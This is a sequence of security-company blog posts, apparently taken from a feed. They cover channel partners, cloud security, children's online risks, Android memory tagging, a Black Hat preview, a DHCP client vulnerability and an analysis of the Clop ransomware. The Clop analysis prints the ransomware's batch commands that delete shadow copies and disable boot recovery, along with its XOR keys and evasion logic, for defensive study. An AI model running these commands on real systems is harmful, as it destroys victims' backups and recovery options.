Incur additional go-to-market costs

I AM McAfee Channel

To Our Channel Partners

We are your partner and your primary advocate inside McAfee.

To Our Company

We are a growth catalyst that helps deliver on our customers’ value drivers at scale, provide deeper customer relationships, and position McAfee as the cybersecurity market leader.

To Our Channel Employees

We are the place to be within McAfee. We embody our company values in all that we do, and we believe that “Together is power.” We foster strong partnerships with and through our channel partners to increase McAfee’s market share and maintain our position as cybersecurity leader, build deeper customer relationships, and help keep the world safe from cyberthreats.

I AM McAfee Channel, and I hope that if you’re a partner with McAfee, this message resonates with you. I know it does with our team, and we are proud to be a part of this partnership with you. Your feedback is welcome in the comments.

The post The McAfee Americas Channel Promise appeared first on McAfee Blogs.

Test Your Knowledge on How Businesses Use and Secure the Cloud

Security used to be an inhibitor to cloud adoption, but now the tables have turned, and for the first time we are seeing security professionals embrace the cloud as a more secure environment for their business. Not only are they finding it more secure, but the benefits of cloud adoption are being accelerated in-step with better security.

Do you know what’s shaping our new world of secure cloud adoption? Do you know what the best practices are for you to accelerate your own business with the cloud? Test your knowledge in this quiz.


Not prepared? Lucky for you this is an “open-book” test. Find some cheat sheets and study guides below.

Report: Cloud Adoption and Risk Report: Business Growth Edition

Blog: Top Findings from the Cloud Adoption and Risk Report: Business Growth Edition

Blog: Why Security Teams Have Come to Embrace the Cloud

MVISION Cloud Data Sheet

MVISION Cloud

The post Test Your Knowledge on How Businesses Use and Secure the Cloud appeared first on McAfee Blogs.

5 Digital Risks That Could Affect Your Kids This New School Year


Starting a new school year is both exciting and stressful for families today. Technology has magnified learning and connection opportunities for our kids, but not without physical and emotional costs that we can’t overlook this time of year.

But the transition from summer to a new school year offers families a fresh slate and the chance to evaluate what digital ground rules need to change when it comes to screen time. So as you consider new goals, here are just a few of the top digital risks you may want to keep on your radar.

  1. Cyberbullying. The online space for a middle or high school student can get ugly this time of year. In two years, cyberbullying has increased significantly from 11.5% to 15.3%. Also, three times as many girls reported being harassed online or by text than boys, according to the U.S. Department of Education.
    Back-to-School Tip: Keep the cyberbullying discussion honest and frequent in your home. Monitor your child’s social media apps if you have concerns that cyberbullying may be happening. To do this, click the social icons periodically to explore behind the scenes (direct messages, conversations, shared photos). Review and edit friend lists, maximize location and privacy settings, and create family ground rules that establish expectations about appropriate digital behavior, content, and safe apps. Make an effort to stay current on the latest social media apps, trends, and texting slang so you can spot red flags. Lastly, be sure kids understand the importance of tolerance, empathy, and kindness among diverse peer groups.
  2. Oversharing. Did you know that 30% of parents report posting a photo of their child(ren) to social media at least once per day, and 58% don’t ask permission? By the age of 13, studies estimate that parents have posted about 1,300 photos and videos of their children online. A family’s collective oversharing can put your child’s privacy, reputation, and physical safety at risk. Besides, with access to a child’s personal information, a cybercriminal can open fraudulent accounts just about anywhere.
    Back-to-School Tip: Think before you post and ask yourself, “Would I be okay with a stranger seeing this photo?” Make sure there is nothing in the photo that could be an identifier such as a birthdate, a home address, school uniforms, financial details, or password hints. Also, maximize privacy settings on social networks and turn off photo geo-tagging that embeds photos with a person’s exact coordinates. Lastly, be sure your child understands the lifelong consequences that sharing explicit photos can have on their lives.
  3. Mental health + smartphone use. There’s no more disputing it (or indulging tantrums that deny it): smartphone use and depression are connected. Several studies of teens from the U.S. and U.K. reveal similar findings: that happiness and mental health are highest at 30 minutes to two hours of extracurricular digital media use a day. Well-being then steadily decreases, according to the studies, which reveal that heavy users of electronic devices are twice as likely to be unhappy, depressed, or distressed as light users.
    Back-to-School Tip: Listen more and talk less. Kids tend to share more about their lives, friends, hopes, and struggles if they believe you are truly listening and not lecturing. Nurturing a healthy, respectful, mutual dialogue with your kids is the best way to minimize a lot of the digital risks your kids face every day. Get practical: Don’t let your kids have unlimited phone use. Set and follow media ground rules and enforce the consequences of abusing them.
  4. Sleep deprivation. Sleep deprivation connected to smartphone use can dramatically increase once the hustle of school begins and Fear of Missing Out (FOMO) accelerates. According to a 2019 Common Sense Media survey, a third of teens take their phones to bed when they go to sleep (33% of girls versus 26% of boys). Also, 1 in 3 teens reports waking up at least once per night to check their phone.
    Back-to-School Tip:
    Kids often text, play games, watch movies or YouTube videos, randomly scroll social feeds, or read the news on their phones in bed. For this reason, establish a phone curfew that prohibits this. Sleep is food for the body, and tweens and teens need about 8 to 10 hours to stay healthy. Discuss the physical and emotional consequences of losing sleep, such as increased illness, poor grades, moodiness, anxiety, and depression.
  5. School-related cyber breaches. Most schools do an excellent job of reinforcing the importance of online safety these days. However, that doesn’t mean their own cybersecurity isn’t vulnerable to cyber threats, which can put your child’s privacy at risk. Breaches happen in the form of phishing emails, ransomware, and loopholes left by weak security protocols.
    Back-to-School Tip: Demand that schools be transparent about the data they collect from students and families. Opt out of the school’s technology policy if you believe it doesn’t protect your child or if you sense an indifferent attitude about privacy. Ask the staff about the school’s cybersecurity policy to ensure it has secure password, software, and network standards in place; weaknesses there could determine whether your family’s data is compromised.

Stay the course, parent, you’ve got this. Armed with a strong relationship and media ground rules relevant to your family, together, you can tackle any digital challenge the new school year may bring.

The post 5 Digital Risks That Could Affect Your Kids This New School Year appeared first on McAfee Blogs.

Adopting the Arm Memory Tagging Extension in Android

As part of our continuous commitment to improve the security of the Android ecosystem, we are partnering with Arm to design the memory tagging extension (MTE). Memory safety bugs, common in C and C++, remain one of the largest classes of vulnerabilities in the Android platform, and although there have been previous hardening efforts, memory safety bugs comprised more than half of the high-priority security bugs in Android 9. Additionally, memory safety bugs manifest as hard-to-diagnose reliability problems, including sporadic crashes or silent data corruption. This reduces user satisfaction and increases the cost of software development. Software testing tools such as ASAN and HWASAN help, but their applicability on current hardware is limited due to noticeable overheads.

MTE, a hardware feature, aims to further mitigate these memory safety bugs by enabling us to detect them with low overhead. It has two execution modes:

  • Precise mode: Provides more detailed information about the memory violation
  • Imprecise mode: Has lower CPU overhead and is more suitable to be always-on.
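The tagging idea itself can be modeled in a few lines. The sketch below is a purely illustrative toy (the tag width and the retag-on-free policy are simplifications for this post, not the Arm design): each allocation and each pointer carry a small tag, and an access with a mismatched tag is reported.

```python
import random

class TaggedHeap:
    """Toy model of memory tagging: a 4-bit tag on the pointer and on the
    allocation must match on every access."""
    def __init__(self):
        self.allocations = {}   # base address -> (tag, size)
        self.next_base = 0x1000

    def malloc(self, size: int):
        tag = random.randrange(16)          # hardware would pick a small random tag
        base = self.next_base
        self.next_base += size
        self.allocations[base] = (tag, size)
        return base, tag                    # the "pointer" carries the tag

    def free(self, base: int) -> None:
        tag, size = self.allocations[base]
        # Retag the memory: any stale pointer now mismatches.
        self.allocations[base] = ((tag + 1) % 16, size)

    def load(self, base: int, ptr_tag: int) -> None:
        mem_tag, _ = self.allocations[base]
        if mem_tag != ptr_tag:
            raise MemoryError("tag mismatch: probable use-after-free or overflow")

heap = TaggedHeap()
ptr, tag = heap.malloc(64)
heap.load(ptr, tag)        # a valid access passes the tag check
heap.free(ptr)
# heap.load(ptr, tag)      # a use-after-free would now raise MemoryError
```

In real MTE the tag lives in otherwise-unused top bits of the pointer and in tag memory, and the check happens in hardware on loads and stores, which is what keeps the overhead low.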

Arm recently published a whitepaper on MTE and has added documentation to the Arm v8.5 Architecture Reference Manual.

We envision several different usage modes for MTE.

  • MTE provides a version of ASAN/HWASAN that is easier to use for testing and fuzzing in laboratory environments. It will find more bugs in a fraction of the time and at a lower cost, reducing the complexity of the development process. In many cases, MTE will allow testing memory safety using the same binary as shipped to production. The bug reports produced by MTE will be as detailed and actionable as those from ASAN and HWASAN.
  • MTE will be used as a mechanism for testing complex software scenarios in production. App Developers and OEMs will be able to selectively turn on MTE for parts of the software stack. Where users have provided consent, bug reports will be available to developers via familiar mechanisms like Google Play Console.
  • MTE can be used as a strong security mitigation in the Android System and applications for many classes of memory safety bugs. For most instances of such vulnerabilities, a probabilistic mitigation based on MTE could prevent exploitation with a higher than 90% chance of detecting each invalid memory access. By implementing these protections and ensuring that attackers can't make repeated attempts to exploit security-critical components, we can significantly reduce the risk to users posed by memory safety issues.

We believe that memory tagging will detect the most common classes of memory safety bugs in the wild, helping vendors identify and fix them, discouraging malicious actors from exploiting them. During the past year, our team has been working to ensure readiness of the Android platform and application software for MTE. We have deployed HWASAN, a software implementation of the memory tagging concept, to test our entire platform and a few select apps. This deployment has uncovered close to 100 memory safety bugs. The majority of these bugs were detected on HWASAN enabled phones in everyday use. MTE will greatly improve upon this in terms of overhead, ease of deployment, and scale. In parallel, we have been working on supporting MTE in the LLVM compiler toolchain and in the Linux kernel. The Android platform support for MTE will be complete by the time of silicon availability.

Google is committed to supporting MTE throughout the Android software stack. We are working with select Arm System On Chip (SoC) partners to test MTE support and look forward to wider deployment of MTE in the Android software and hardware ecosystem. Based on the current data points, MTE provides tremendous benefits at acceptable performance costs. We are considering MTE as a possible foundational requirement for certain tiers of Android devices.

Thank you to Mitch Phillips, Evgenii Stepanov, Vlad Tsyrklevich, Mark Brand, and Serban Constantinescu for their contributions to this post.

Grasshoppers, Dead Cow, and Controlled Chaos: What We’re Looking Forward to at Black Hat USA


Usually, Black Hat USA is all the rage this time of year when it comes to Las Vegas; however, it seems the excitement about the show has been eclipsed by a grasshopper invasion. I admit, I was puzzled when my colleagues informed me of the news and proceeded to show me the horrifying photographic and video evidence. I joked that I would need to wear a Veracode-branded beekeeper suit, and wondered what the symbolism of the grasshopper is. So before I get to what you really care about – Black Hat – I leave you with two fun facts:

  1. Upon asking my mother – a Las Vegas resident – about the grasshopper invasion, she informed me that this happens every year, but it usually isn’t this bad, and that her side of town has significantly fewer grasshoppers.
  2. Grasshoppers can’t move sideways or backwards; they can only take big leaps forward. That seems apt when we’re considering the future of security and development.

Without further ado, here are three events I’m most looking forward to attending at this year’s show:

Controlled Chaos: The Inevitable Marriage of DevOps & Security

Kelly Shortridge, VP of Product Strategy at Capsule8, and Dr. Nicole Forsgren, Research & Strategy at Google Cloud, will take a closer look at the choice information security has to make when it comes to DevOps: marry with their DevOps colleagues and embrace the philosophy of controlled chaos, or eventually lose the race, because software – secure software especially – is a competitive differentiator in today’s global economy. I’m curious to see Shortridge and Forsgren’s take on DevOps, the concepts of resilience and chaos engineering, and the impact on the future of security programs.

Where: South Pacific When: Aug. 7 from 4-4:50 p.m. Read More: Here

All Things Cult of the Dead Cow

Remember when much of the nation was astonished to learn that presidential candidate Beto O’Rourke was a member of America’s oldest hacking group, The Cult of the Dead Cow (cDc)? This was after Reuters reporter Joseph Menn published a special report that was adapted from his book Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World. While I’ll be sure to check out the briefing at BHUSA, at Veracode, we’re excited to host a conversation with Menn; Chris Wysopal, Veracode’s CTO; Christien Rioux, Software Architect at Flowmill; and Luke “Deth Veggie” Benfey, cDc Minister of Propaganda, for a discussion about the new book at our booth. Plus, we’re donating $2 to BuildOn for every booth visit.

Where: Booth #854 When: Aug. 7 from 5-6:30 p.m. Read More: Here

DevSecOps: What, Why and How

When it comes to development, security is often added towards the end of the DevOps cycle through a manual/automated review – but we know it doesn’t have to be that way. Security can actually be integrated – and automated – at each stage of the DevOps pipeline. In this briefing, Anant Shrivastava from NotSoSecure will dive into the technology and cultural aspects of DevSecOps, and the changes needed to get tangible benefits. Shrivastava will also present case studies on how critical bugs and security breaches affecting popular software and applications could have been prevented using a simple DevSecOps approach.

Where: South Pacific When: Aug. 8 from 11-11:50 a.m. Read More: Here

We’d love to talk to you about your own development shop and security practices during the show, so please stop by Booth #854 – we’ve got demos, spun chairs, and we’ll send you home with a one-of-a-kind custom t-shirt.

I’m not sure I’ll be able to score that branded beekeeper suit, but I’m looking forward to seeing everything Black Hat has to offer. If you’re open to sharing what you’re looking forward to at the show, let’s connect on Twitter (@lauraleapaine) so I can get your perspective. Make sure to check back here for live coverage – or subscribe to get our content updates sent directly to your inbox.

DHCP Client Remote Code Execution Vulnerability Demystified

CVE-2019-0547

CVE-2019-0547 was the first vulnerability patched by Microsoft this year. The dynamic link library, dhcpcore.dll, which is responsible for DHCP client services in a system, is vulnerable to malicious DHCP reply packets.

This vulnerability allows remote code execution if the user tries to connect to a network with a rogue DHCP Server, hence making it a critical vulnerability.

DHCP protocol overview

DHCP is a client-server protocol used to dynamically assign IP addresses when a computer connects to a network. The DHCP server listens on port 67 and is responsible for distributing IP addresses to DHCP clients and allocating TCP/IP configuration to endpoints.

The DHCP handshake is represented below:

During DHCP Offer and DHCP Ack, the packet contains all the TCP/IP configuration information required for a client to join the network. The structure of a DHCP Ack packet is shown below:

The options field holds several parameters required for basic DHCP operation. One of the options in the Options field is Domain Search (type field is 119).

Domain Search Option field (RFC 3397)

This option is passed along with OFFER and ACK packets to the client to specify the domain search list used when resolving hostnames using DNS. The format of the DHCP option field is as follows:

To enable the searchlist to be encoded compactly, searchstrings in the searchlist are concatenated and encoded.

A list of domain names such as www.example.com and dns.example.com is encoded thus:
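The concatenated encoding uses DNS-style labels: each label is prefixed by its length, and each name is terminated by a zero byte. A short Python sketch (compression pointers, which RFC 3397 also allows, are omitted for clarity):

```python
def encode_search_list(domains):
    """Encode a DHCP option 119 search list as DNS-style labels (no compression)."""
    out = bytearray()
    for domain in domains:
        for label in domain.split("."):
            out.append(len(label))          # one length byte per label
            out += label.encode("ascii")
        out.append(0)                       # a zero byte terminates each name
    return bytes(out)

encoded = encode_search_list(["www.example.com", "dns.example.com"])
# b'\x03www\x07example\x03com\x00\x03dns\x07example\x03com\x00'
```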

Vulnerability

There is a vulnerability in the DecodeDomainSearchListData function of dhcpcore.dll.

The DecodeDomainSearchListData function decodes the encoded search list option field value. While decoding, the function calculates the length of the decoded domain name list, allocates memory, and copies the decoded list into it.

A malicious user can craft an encoded search list such that, when the DecodeDomainSearchListData function decodes it, the resulting length is zero. This leads to a HeapAlloc of zero bytes, resulting in an out-of-bounds write.

Patch

The patch includes a check which ensures the size argument to HeapAlloc is not zero. If it is zero, the function exits.
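Conceptually, the fix can be pictured as follows. This Python sketch illustrates the decode-then-allocate pattern with the patched zero-size guard; it is not the actual dhcpcore.dll code, and it ignores the compression pointers a real parser must handle:

```python
def decode_search_list(data: bytes):
    """Decode DNS-style labels into domain names, refusing a zero-length result
    (mirroring the patched check before the HeapAlloc call)."""
    names, labels, i = [], [], 0
    while i < len(data):
        n = data[i]; i += 1
        if n == 0:                      # zero byte ends the current name
            names.append(".".join(labels)); labels = []
        else:
            labels.append(data[i:i + n].decode("ascii")); i += n
    total = sum(len(name) for name in names)
    if total == 0:                      # patched code exits instead of allocating 0 bytes
        raise ValueError("decoded search list is empty; refusing zero-size allocation")
    return names
```

A crafted option value consisting only of terminator bytes would previously have reached the allocation with a size of zero; with the guard, the decode path simply bails out.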

Conclusion

A rogue DHCP server on the network can exploit this vulnerability by replying to DHCP requests from clients. The rogue DHCP server can also be a wireless access point to which a user connects. Successful exploitation of this vulnerability can trigger code execution on the client and allow an attacker to take control of the system.

McAfee NSP customers are protected from this attack by signature “0x42602000”.

The post DHCP Client Remote Code Execution Vulnerability Demystified appeared first on McAfee Blogs.

Clop Ransomware

This new ransomware was discovered by Michael Gillespie on 8 February 2019, and it is still evolving over time. This blog will explain the technical details and share information about how this new ransomware family works. There are some variants of the Clop ransomware, but in this report we will focus on the main version and highlight parts of those variations. The main goal of Clop is to encrypt all files in an enterprise and request a payment in exchange for a decryptor for the affected files. To achieve this, we observed some new techniques being used by the author that we have not seen before. Clearly, over the last few months we have seen more innovative techniques appearing in ransomware.

Clop Overview

The Clop ransomware is usually packed to hide its inner workings. The sample we analyzed was also signed with the following certificate in the first version (now revoked):

FIGURE 1. Packer signed to avoid av programs and mislead the user

Signing a malicious binary, in this case ransomware, may trick security solutions into trusting the binary and letting it pass. Although this initial certificate was revoked within a few days, another version appeared soon after with another certificate:

FIGURE 2. New certificate in new version

This sample was discovered by MalwareHunterTeam (https://twitter.com/malwrhunterteam) on 26 February 2019.

We discovered the following Clop ransomware samples which were signed with a certificate:

This malware is prepared to avoid running under certain conditions; for example, the first version requests to be installed as a service, and if that does not succeed, it will terminate itself.

The malware’s first action is to check the keyboard layout of the victim’s computer using the function “GetKeyboardLayout” against hardcoded values.

This function returns the user keyboard input layout at the moment the malware calls the function.

The malware checks whether the layout value is greater than 0x0437 (Georgian), and makes some calculations against the Russian language (0x0419) and the Azerbaijani language (0x082C). This function returns 1 if the layout belongs to Russia or another CIS country, and 0 in every other case.

FIGURE 3. Checking the keyboard layout

If the function returns 0, the malware continues on its normal flow; otherwise, it gets the device context of the entire screen with the function “GetDC”. Another condition comes from the function “GetTextCharset”, which returns the character set of the font currently used in the system; the malware checks whether it has the value 0xCC (RUSSIAN_CHARSET). If that charset is in use, the malware deletes itself from disk and terminates itself with “TerminateProcess”; if it is not, it continues on its normal flow. This double check covers users with a multi-language system, i.e. those who have the Russian language installed but not active on the machine, so that they also avoid this type of malware.

FIGURE 4. Check the text charset and compare with Russian charset
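Put together, the two checks form a simple locale gate. The sketch below is only an approximation built from the values quoted above (the binary's exact arithmetic differs), but it captures the decision the malware makes:

```python
# Layout and charset identifiers quoted in the analysis above.
RUSSIAN, AZERBAIJANI, GEORGIAN = 0x0419, 0x082C, 0x0437
RUSSIAN_CHARSET = 0xCC

def should_skip_infection(layout_id: int, charset: int) -> bool:
    """Approximate Clop's double check: skip machines whose keyboard layout
    or active font charset suggests a CIS locale."""
    cis_layout = layout_id in (RUSSIAN, AZERBAIJANI, GEORGIAN)
    return cis_layout or charset == RUSSIAN_CHARSET
```

This is why a machine with a Russian layout installed but inactive is still caught: the charset check fires even when the layout check does not.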

The code that is supposed to delete the ransomware from disk contains an error: it calls the system’s command prompt directly without waiting for the malware to finish. The command itself executes correctly but, because the malware is still running, the file cannot be deleted from disk. This happens because the author did not use a “timeout” command.

FIGURE 5. Deletion of the malware itself

The next action of the malware is to create a new thread that will start all processes. With the handle of this thread, it will wait an infinite amount of time for it to finish with the “WaitForSingleObject” function, then return to the winMain function and exit.

This thread’s first action is to create a file called “Favorite” in the same folder as the malware. Later, it checks the last error with “GetLastError” and, if the last error was 0, it waits 5 seconds with the function “Sleep”.

Later, the thread makes a dummy call to the function “EraseTape” with a handle of 0, perhaps to disturb emulators because the handle is set to 0 in a hardcoded opcode, and then a call to the function “DefineDosDeviceA” with an invalid name that returns another error. These operations loop 666,000 times.

FIGURE 6. Loop to disturb the analysis

The next action is to search for some processes with these names:

  • SBAMTray.exe (Vipre antivirus product)
  • SBPIMSvc.exe (Sunbelt AntiMalware antivirus product)
  • SBAMSvc.exe (GFI AntiMalware antivirus product)
  • VipreAAPSvc.exe (Vipre antivirus product)
  • WRSA.exe (WebRoot antivirus product)

If any of these processes are discovered, the malware waits 5 seconds using “Sleep” and then another 5 seconds. After those sleeps, the malware continues with its normal flow. If these processes are not detected, it accesses its own resources and extracts one with the name “OFFNESTOP1”. That resource is encrypted, but it contains a “.bat” file.

FIGURE 7. Accessing the first encrypted resource

The decryption is a simple XOR operation with bytes from this string:

“Po39NHfwik237690t34nkjhgbClopfdewquitr362DSRdqpnmbvzjkhgFD231ed76tgfvFAHGVSDqhjwgdyucvsbCdigr1326dvsaghjvehjGJHGHVdbas”.
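A repeating-key XOR like this is symmetric, so a single routine both encrypts and decrypts. A sketch using the key string above (the sample plaintext is illustrative, taken from the batch commands described below, not a dump of the real resource):

```python
# Key string recovered from the sample, as quoted above.
KEY = b"Po39NHfwik237690t34nkjhgbClopfdewquitr362DSRdqpnmbvzjkhgFD231ed76tgfvFAHGVSDqhjwgdyucvsbCdigr1326dvsaghjvehjGJHGHVdbas"

def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """XOR each byte with the repeating key; XOR is its own inverse,
    so the same function both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

plaintext = b"vssadmin Delete Shadows /all /quiet"   # illustrative sample
ciphertext = xor_with_key(plaintext)
assert xor_with_key(ciphertext) == plaintext         # round trip restores the data
```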

The next action is to write this batch file in the same folder where the malware resides, using the function “CreateFileA”. The file created has the name “clearsystems-11-11.bat”. The malware then launches it with “ShellExecuteA”, waits 5 seconds for it to finish, and deletes the file with the function “DeleteFileA”.

It is clear that the authors are not experienced programmers because they are using a .bat file for the next actions:

  • Delete the shadow volumes with vssadmin (“vssadmin Delete Shadows /all /quiet”).
  • Resize the shadow storage for all drive letters from C to H (hardcoded) to prevent the shadow volumes from being created again.
  • Use the bcdedit program to disable the recovery options in the machine’s boot configuration and set it to ignore any boot failure instead of warning the user.

All these actions could have been performed in the malware code itself, without the need of an external file that can be detected and removed.

FIGURE 8. The BAT file to disable the shadow volumes and more security

The next action is to create a mutex with the hardcoded name “Fany—Fany—6-6-6” and then call the function “WaitForSingleObject” and compare the result with 0. If the value is 0, it means the mutex was created by this instance of the malware; if it gets another value, it means the mutex was created by another instance or by a vaccine, and in that case the malware finishes its execution.

After this, it creates 2 threads: one to search for processes and the other to encrypt files on the network shares it has access to.

The first thread enumerates all processes in the system, converts each process name to upper case, and calculates a hash of the name with a custom algorithm, comparing it against a big list of hashes. This is typical of malware that tries to hide which processes it is looking for. If it finds one of them, it opens the process with the necessary rights using the “OpenProcess” function and terminates it with the “TerminateProcess” function.

The malware contains 61 hard-coded hashes of programs such as “STEAM.EXE”, database programs, office programs and others.
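The custom hash itself is not reproduced in this article, so the match-by-hash pattern is sketched below with a hypothetical 32-bit rolling hash; the constant 31 and the process names other than “STEAM.EXE” are illustrative assumptions:

```python
# Hypothetical stand-in for Clop's custom hash: a 31-multiplier rolling
# hash truncated to 32 bits. Only the pattern (upper-case the name, hash
# it, compare against a stored hash list) mirrors the malware's behavior.
def name_hash(name: str) -> int:
    h = 0
    for ch in name.upper():                  # names are upper-cased first
        h = (h * 31 + ord(ch)) & 0xFFFFFFFF  # keep the value in 32 bits
    return h

# The binary stores only hashes, hiding which processes it hunts for.
KILL_HASHES = {name_hash(n) for n in ("STEAM.EXE", "SQLSERVR.EXE", "WINWORD.EXE")}

def should_kill(process_name: str) -> bool:
    return name_hash(process_name) in KILL_HASHES

assert should_kill("steam.exe")          # matching is case-insensitive
assert not should_kill("explorer.exe")
```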

Below are the first 38 hashes with their associated process names. These 38 processes are the most common processes to close, as we have observed with other ransomware families such as GandCrab, Cerber, etc.

This thread runs in an infinite loop, waiting 30 minutes per iteration using the function “Sleep”.

FIGURE 9. Thread to kill critical processes to unlock files

The second thread created has the task of enumerating all network shares and encrypting files on those the malware has access to.

To perform this task, it uses the typical API functions of the module “MPR.DLL”:

  • WNetOpenEnumW
  • WNetEnumResourceW
  • WNetCloseEnum

This thread starts by allocating memory with the “GlobalAlloc” function to hold the information returned by the “MPR” functions.

For each network share the malware discovers, it prepares to enumerate more shares and encrypt files.

For each folder discovered, it enters it and searches for more subfolders and files. The first step is to check the name of each folder/file found against a hardcoded list of hashes, using the same algorithm used to detect the processes to close.

Below are the results of 12 of the 27 hashes with the correct names:

If the name passes this check and the entry is a file rather than a folder, the malware compares the name against a list of hardcoded names and extensions that are stored in plain text rather than as hashes:

  • ClopReadMe.txt
  • ntldr
  • NTDLR
  • boot.ini
  • BOOT.INI
  • ntuser.ini
  • NTUSER.INI
  • AUTOEXEC.BAT
  • autoexec.bat
  • .Clop
  • NTDETECT.COM
  • ntdetect.com
  • .dll
  • .DLL
  • .exe
  • .EXE
  • .sys
  • .SYS
  • .ocx
  • .OCX
  • .LNK
  • .lnk
  • desktop.ini
  • autorun.inf
  • ntuser.dat
  • iconcache.db
  • bootsect.bak
  • ntuser.dat.log
  • thumbs.db
  • DESKTOP.INI
  • AUTORUN.INF
  • NTUSER.DAT
  • ICONCACHE.DB
  • BOOTSECT.BAK
  • NTUSER.DATA.LOG
  • THUMBS.DB

This check is done with a custom function that compares character per character against the whole list. This is why the list contains the same names in both upper and lower case: using a function such as “lstrcmpiA” instead could allow a hook on that function to prevent a file from being affected. Checking the extension at the same time makes the encryption process quicker. Of course, the malware also checks that the file does not have the name of the ransom note or the extension that it puts on encrypted files. The blacklisted extensions help the system avoid crashing during encryption, compared with other ransomware families.
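A sketch of that skip check, using a small subset of the list above; the point is that only exact, case-sensitive comparisons are made, which is why both case variants appear in the list:

```python
# Sketch of the name/extension skip check: plain character-per-character
# matching, never a case-insensitive API such as lstrcmpiA that could be
# hooked. Subset of the real list, for brevity.
SKIP_NAMES = {"ClopReadMe.txt", "boot.ini", "BOOT.INI", "desktop.ini", "DESKTOP.INI"}
SKIP_EXTS = (".dll", ".DLL", ".exe", ".EXE", ".sys", ".SYS", ".Clop")

def is_skipped(filename: str) -> bool:
    return filename in SKIP_NAMES or filename.endswith(SKIP_EXTS)

assert is_skipped("kernel32.dll")      # system binaries are left alone
assert not is_skipped("report.docx")   # a document gets encrypted
assert not is_skipped("oddcase.Dll")   # mixed case slips past the check
```

The last assertion shows the cost of avoiding a case-insensitive compare: a mixed-case variant of a listed extension is not matched.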

FIGURE 10. Check of file names and extensions

This behavior is normal in ransomware, but the earlier check against hardcoded hashes of the file/folder name is odd because, as the picture above shows, the next check is against plain-text strings.

If it passes this check, the malware creates a new thread with a struct containing a hardcoded key block, the name of the file, and the path where the file exists. The first action in this thread is to set the error mode to 1 with “SetErrorMode”, to avoid an error dialog being shown to the user if the malware crashes. Later, it prepares the path to the file from the struct passed as an argument to the thread and changes the attributes of the file to ARCHIVE with the function “SetFileAttributesW”; however, the malware does not check whether this action succeeds.

Later it generates a random AES key and encrypts each byte of the file with this key. Next, it puts the mark “Clop^_” at the end of the file and, after the mark, the key used to encrypt the file, itself encrypted with the master RSA key hardcoded in the malware to protect it against third-party free decryptors.
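The resulting on-disk layout can be sketched as follows; the AES and RSA operations are replaced with opaque byte strings, since only the marker and tail layout described above are being illustrated:

```python
# Sketch of the encrypted-file layout: [ciphertext]["Clop^_" marker]
# [per-file AES key wrapped with the hardcoded RSA public key]. The
# crypto itself is mocked; only the layout is shown.
MARK = b"Clop^_"

def pack(ciphertext: bytes, wrapped_key: bytes) -> bytes:
    return ciphertext + MARK + wrapped_key

def unpack(blob: bytes):
    pos = blob.rfind(MARK)              # marker separates data and key
    return blob[:pos], blob[pos + len(MARK):]

data, key = unpack(pack(b"\x01\x02\x03", b"<rsa-wrapped-aes-key>"))
assert (data, key) == (b"\x01\x02\x03", b"<rsa-wrapped-aes-key>")
```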

The malware can use 2 different public RSA keys: one exported using the crypto API as a public blob, or the one embedded in base64 in the malware. The malware only uses the second one if it cannot create the crypto context or has some problem with the crypto API functions.

The malware’s use of the crypto functions does not support Windows XP, because the CSP used in Windows XP has another name; if run on another operating system, starting with Windows Vista, the name can be changed in a debugger to acquire the context later, and it will generate an RSA public blob.

Another difference from other ransomware families is that Clop will only cipher drives that are physically attached/embedded disks (FIXED, type 3) or removable (type 2). The malware ignores the REMOTE type (4).
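In terms of the standard Win32 GetDriveType constants (DRIVE_REMOVABLE = 2, DRIVE_FIXED = 3, DRIVE_REMOTE = 4), the filter amounts to:

```python
# Drive filter as described above, expressed with the Win32 GetDriveType
# constants. Remote (mapped) drives are skipped here; shares are handled
# separately by the MPR.DLL enumeration thread.
DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_REMOTE = 2, 3, 4

def should_encrypt_drive(drive_type: int) -> bool:
    return drive_type in (DRIVE_REMOVABLE, DRIVE_FIXED)

assert should_encrypt_drive(DRIVE_FIXED)
assert should_encrypt_drive(DRIVE_REMOVABLE)
assert not should_encrypt_drive(DRIVE_REMOTE)
```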

Anyway, the shares can still be affected using the “MPR.DLL” functions without any problem.

FIGURE 11. File marker in the encrypted file, followed by the encrypted key

After encrypting a file, the malware tries to open the ransom note in the same folder and, if it exists, continues without overwriting it to save time. If the ransom note does not exist, it accesses a resource in the malware called “OFFNESTOP”. This resource is encrypted with the same XOR operation as the first resource (the .bat file); after decrypting it, the malware writes the ransom note in the folder of the file.

FIGURE 12. Creation of the ransom note from an encrypted resource

Here is a sample of the ransom note of the first version of this malware:

FIGURE 13. Example of ransom note of the first version of the malware

After this, Clop continues with the next file using the same process; however, the name check based on the hash is now skipped.

Second Version of the Malware

The second version, found at the end of February, has some changes compared with the first one. The hash of this version is: “ed7db8c2256b2d5f36b3d9c349a6ed0b”.

The first change is to some of the plain-text strings used in the “EraseTape” and “FindAtomW” calls that slow down execution. Now the name for the tape is “” and for the atom “”.

The second change is the names of the encrypted resources in the binary. The first resource, a second batch file that deletes the shadow volumes and removes the boot protections like the previous one, now has another name: “RC_HTML1”.

FIGURE 14. New resource name for the batch file

However, the algorithm to decrypt this resource is the same; only the big string acting as the key for the bytes has changed. Now the string is: “JLKHFVIjewhyur3ikjfldskfkl23j3iuhdnfklqhrjjio2ljkeosfjh7823763647823hrfuweg56t7r6t73824y78Clop”. It is important to remember that this string remains in plain text in the binary but, as it changes between samples, it cannot be used for a Yara rule. The same goes for the resource names and the hash of the resource, because the bat file differs between samples, in some cases per line and in others because it contains more code to stop services of security and database products.

The contents of the new BAT file are:

@echo off

vssadmin Delete Shadows /all /quiet

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

bcdedit /set {default} recoveryenabled No

bcdedit /set {default} bootstatuspolicy ignoreallfailures

vssadmin Delete Shadows /all /quiet

